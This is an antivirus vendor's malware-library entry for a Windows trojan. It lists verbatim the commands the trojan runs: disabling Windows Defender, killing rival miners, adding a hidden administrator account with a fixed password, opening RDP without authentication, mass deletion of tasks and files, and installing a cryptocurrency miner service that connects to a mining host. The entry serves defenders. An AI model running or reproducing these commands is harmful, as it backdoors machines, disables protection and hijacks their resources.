PARA USUARIOS

Cerrar

Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Buscar
Buscar

Soporte
Soporte 24 horas | Normas de contactar

Escribir

una solicitud al rellenar un formulario

Llamar

+7 (495) 789-45-86

Foro

Sus solicitudes

Crear una nueva solicitud

Llamar

+7 (495) 789-45-86

Perfil

ES

RU CN DE EN ES FR IT JP KZ UZ PL BY
Cerrar
Servicios
Escáneres
Dr.Web vxCube
Demo
Peritaje de IIV
Biblioteca de virus
Base de conocimiento

Tecnologías

Términos

Formación y educación

Mitos

Noticias

Trojan.MulDrop7.55003

Added to the Dr.Web virus database: 2017-12-19

Virus description added:

Technical Information

Malicious functions:
Executes the following:
  • '<SYSTEM32>\net.exe' stop LocalConnectXdc
  • '<SYSTEM32>\net.exe' stop WindowsDefender
  • '<SYSTEM32>\net.exe' stop LocalConnectMnr
  • '<SYSTEM32>\net.exe' stop Service4
  • '<SYSTEM32>\net.exe' stop sqlservrd
  • '<SYSTEM32>\taskkill.exe' /IM cpuminer-sse42.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msdtced.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im HostXmrig.exe
  • '<SYSTEM32>\taskkill.exe' /f /im 1.exe
  • '<SYSTEM32>\net.exe' stop AdobeFlashPlayerHash
  • '<SYSTEM32>\net.exe' stop reg
  • '<SYSTEM32>\net.exe' stop RpcEptManger
  • '<SYSTEM32>\net.exe' stop Samserver
  • '<SYSTEM32>\net.exe' stop WinRDPSvc
  • '<SYSTEM32>\net.exe' stop "CCOM Surrogate"
  • '<SYSTEM32>\net.exe' stop MsUpdateServiceD
  • '<SYSTEM32>\net.exe' stop TaskNetHost
  • '<SYSTEM32>\net.exe' stop RegGroom
  • '<SYSTEM32>\net.exe' stop Googler
  • '<SYSTEM32>\net.exe' stop svchost
  • '<SYSTEM32>\net.exe' stop WSService
  • '<SYSTEM32>\taskkill.exe' /IM msiexeced.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im user.exe
  • '<SYSTEM32>\taskkill.exe' /f /im microsoft.exe
  • '<SYSTEM32>\taskkill.exe' /f /im *tmp.exe
  • '<SYSTEM32>\taskkill.exe' /f /im schtasks*
  • '<SYSTEM32>\taskkill.exe' /f /im microsofts*
  • '<SYSTEM32>\taskkill.exe' /f /im xmr*
  • '<SYSTEM32>\taskkill.exe' /f /im wscript.exe
  • '<SYSTEM32>\taskkill.exe' /f /im esif.exe
  • '<SYSTEM32>\taskkill.exe' /f /im tmp*
  • '<SYSTEM32>\taskkill.exe' /f /im rigx*
  • '<SYSTEM32>\taskkill.exe' /f /im msiexec.exe
  • '<SYSTEM32>\taskkill.exe' /f /im sa.exe
  • '<SYSTEM32>\taskkill.exe' /IM monero.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM minerg.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im ggdllhost.exe
  • '<SYSTEM32>\taskkill.exe' /IM cpuminer.exe /F
  • '<SYSTEM32>\taskkill.exe' /f /im Service4.exe
  • '<SYSTEM32>\taskkill.exe' /f /im bitsadmin.exe
  • '<SYSTEM32>\taskkill.exe' /f /im mxsvc.exe
  • '<SYSTEM32>\taskkill.exe' /f /im update.exe
  • '<SYSTEM32>\taskkill.exe' /f /im SystemRunDll3.exe
Modifies file system:
Deletes the following files:
  • %WINDIR%\Temp\Perflib_Perfdata_7e8.dat
Miscellaneous:
Searches for the following windows:
  • ClassName: '' WindowName: ''
Executes the following:
  • '<SYSTEM32>\sc.exe' config RpcEptManger start= Disabled
  • '<SYSTEM32>\net1.exe' stop WinRDPSvc
  • '<SYSTEM32>\sc.exe' config WinRDPSvc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config WinDefend start= disabled
  • '<SYSTEM32>\net1.exe' stop RpcEptManger
  • '<SYSTEM32>\cmd.exe' /c sc config MsUpdateServiceD start= Disabled
  • '<SYSTEM32>\net1.exe' stop Samserver
  • '<SYSTEM32>\cmd.exe' /c sc config RpcEptManger start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop RpcEptManger
  • '<SYSTEM32>\cmd.exe' /c net stop MsUpdateServiceD
  • '<SYSTEM32>\cmd.exe' /c sc config WinRDPSvc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WinRDPSvc
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net1.exe' stop MsUpdateServiceD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\sc.exe' config "CCOM Surrogate" start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\sc.exe' stop WinDefend
  • '<SYSTEM32>\sc.exe' config MsUpdateServiceD start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc stop WinDefend
  • '<SYSTEM32>\cmd.exe' /c sc config "CCOM Surrogate" start= Disabled
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\cmd.exe' /c net stop "CCOM Surrogate"
  • '<SYSTEM32>\sc.exe' config TaskNetHost start= Disabled
  • '<SYSTEM32>\sc.exe' config RegGroom start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config Googler start= Disabled
  • '<SYSTEM32>\net1.exe' stop RegGroom
  • '<SYSTEM32>\cmd.exe' /c sc config WSService start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WSService
  • '<SYSTEM32>\cmd.exe' /c sc config TaskNetHost start= Disabled
  • '<SYSTEM32>\net1.exe' stop sqlservrd
  • '<SYSTEM32>\sc.exe' config Service4 start= Disabled
  • '<SYSTEM32>\net1.exe' stop reg
  • '<SYSTEM32>\cmd.exe' /c net stop Googler
  • '<SYSTEM32>\net1.exe' stop Service4
  • '<SYSTEM32>\net1.exe' stop WSService
  • '<SYSTEM32>\cmd.exe' /c net stop Samserver
  • '<SYSTEM32>\sc.exe' config WSService start= Disabled
  • '<SYSTEM32>\sc.exe' config Samserver start= Disabled
  • '<SYSTEM32>\net1.exe' stop svchost
  • '<SYSTEM32>\cmd.exe' /c sc config Samserver start= Disabled
  • '<SYSTEM32>\net1.exe' stop Googler
  • '<SYSTEM32>\cmd.exe' /c net stop svchost
  • '<SYSTEM32>\sc.exe' config Googler start= Disabled
  • '<SYSTEM32>\sc.exe' config svchost start= Disabled
  • '<SYSTEM32>\net1.exe' stop TaskNetHost
  • '<SYSTEM32>\cmd.exe' /c sc config svchost start= Disabled
  • '<SYSTEM32>\net1.exe' accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\net1.exe' localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net1.exe' user sqlserver /expires:never
  • '<SYSTEM32>\net.exe' localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\net1.exe' localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver /active:yes
  • '<SYSTEM32>\net.exe' accounts / MaxPWAge: unlimited
  • '<SYSTEM32>\cmd.exe' /c gpupdate /force
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /c SCHTASKS /Delete /TN * /F
  • '<SYSTEM32>\gpupdate.exe' /force
  • '<SYSTEM32>\net.exe' start termservice
  • '<SYSTEM32>\schtasks.exe' /Delete /TN * /F
  • '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net.exe' user sqlserver /active:yes
  • '<SYSTEM32>\cmd.exe' /c net start termservice
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net1.exe' user sqlserver /active:yes
  • '<SYSTEM32>\net.exe' localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net.exe' localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@! /ADD
  • '<SYSTEM32>\net1.exe' stop "CCOM Surrogate"
  • '<SYSTEM32>\net.exe' localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administradores sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net user sqlserver /expires:never
  • '<SYSTEM32>\net.exe' localgroup Administrateurs sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net.exe' user sqlserver /expires:never
  • '<SYSTEM32>\net1.exe' localgroup Administrators sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administratorer sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup Amministratori sqlserver /ADD
  • '<SYSTEM32>\net1.exe' localgroup "Remote Desktop users" sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\net.exe' localgroup Administratorzy sqlserver /ADD
  • '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@!
  • '<SYSTEM32>\cmd.exe' /c net localgroup Administratoren sqlserver /ADD
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.bat
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.vbs
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM msdtced.exe /F
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.bat
  • '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.vbs
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM minerg.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM monero.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im ggdllhost.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM msiexeced.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer-sse42.exe /F
  • '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer.exe /F
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx64
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx32
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\32
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\mpl.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x64
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x32
  • '<SYSTEM32>\cmd.exe' /c del /q /a <SYSTEM32>\monero.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsofts.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsoft.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x32
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64n
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im xmr*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im rigx*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im wscript.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsofts*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im esif.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsoft.exe
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Description "sqlbrowser"
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers AppParameters "-a cryptonight -o cloudfront-lc.ddnsking.com:443 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5v...
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost install sqlbrowsers "%windir%\fonts\sqlservr.exe"
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost start sqlbrowsers
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Start SERVICE_DELAYED_AUTO_START
  • '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers DisplayName "sqlserverd"
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im bitsadmin.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im update.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im msiexec.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\temp
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im SystemRunDll3.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im sa.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im user.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im schtasks*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im tmp*
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im mxsvc.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im Service4.exe
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im *tmp.exe
  • '<SYSTEM32>\sc.exe' config WindowsDefender start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop sqlservrd
  • '<SYSTEM32>\cmd.exe' /c sc config LocalConnectMnr start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop Service4
  • '<SYSTEM32>\cmd.exe' /c sc config sqlservrd start= Disabled
  • '<SYSTEM32>\sc.exe' config LocalConnectXdc start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop LocalConnectXdc
  • '<SYSTEM32>\sc.exe' config AdobeFlashPlayerHash start= Disabled
  • '<SYSTEM32>\net1.exe' user systems /delete
  • '<SYSTEM32>\cmd.exe' /c net stop LocalConnectMnr
  • '<SYSTEM32>\net1.exe' stop AdobeFlashPlayerHash
  • '<SYSTEM32>\cmd.exe' /c sc config LocalConnectXdc start= Disabled
  • '<SYSTEM32>\net1.exe' stop LocalConnectMnr
  • '<SYSTEM32>\cmd.exe' /c net stop RegGroom
  • '<SYSTEM32>\net1.exe' stop LocalConnectXdc
  • '<SYSTEM32>\cmd.exe' /c net stop TaskNetHost
  • '<SYSTEM32>\sc.exe' config reg start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config RegGroom start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config Service4 start= Disabled
  • '<SYSTEM32>\sc.exe' config LocalConnectMnr start= Disabled
  • '<SYSTEM32>\net1.exe' stop WindowsDefender
  • '<SYSTEM32>\cmd.exe' /c sc config reg start= Disabled
  • '<SYSTEM32>\sc.exe' config sqlservrd start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop reg
  • '<SYSTEM32>\net.exe' user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net user .system /delete
  • '<SYSTEM32>\cmd.exe' /c net user emad /delete
  • '<SYSTEM32>\cmd.exe' /c net user systems /delete
  • '<SYSTEM32>\net.exe' user emad /delete
  • '<SYSTEM32>\net.exe' user sysdba /delete
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\csrss.exe
  • '<SYSTEM32>\cmd.exe' /c del /a %windir%\dllhostts.exe
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\ServiceProfiles
  • '<SYSTEM32>\cmd.exe' /c net user ` /delete
  • '<SYSTEM32>\cmd.exe' /c net user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net user sysdba /delete
  • '<SYSTEM32>\net1.exe' user ` /delete
  • '<SYSTEM32>\net1.exe' user sysdba /delete
  • '<SYSTEM32>\cmd.exe' /c sc config AdobeFlashPlayerHash start= Disabled
  • '<SYSTEM32>\cmd.exe' /c sc config WindowsDefender start= Disabled
  • '<SYSTEM32>\cmd.exe' /c net stop WindowsDefender
  • '<SYSTEM32>\net1.exe' user emad /delete
  • '<SYSTEM32>\net.exe' user ` /delete
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im HostXmrig.exe
  • '<SYSTEM32>\net1.exe' user Admiin /delete
  • '<SYSTEM32>\cmd.exe' /c net stop AdobeFlashPlayerHash
  • '<SYSTEM32>\net.exe' user systems /delete
  • '<SYSTEM32>\cmd.exe' /c taskkill /f /im 1.exe

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play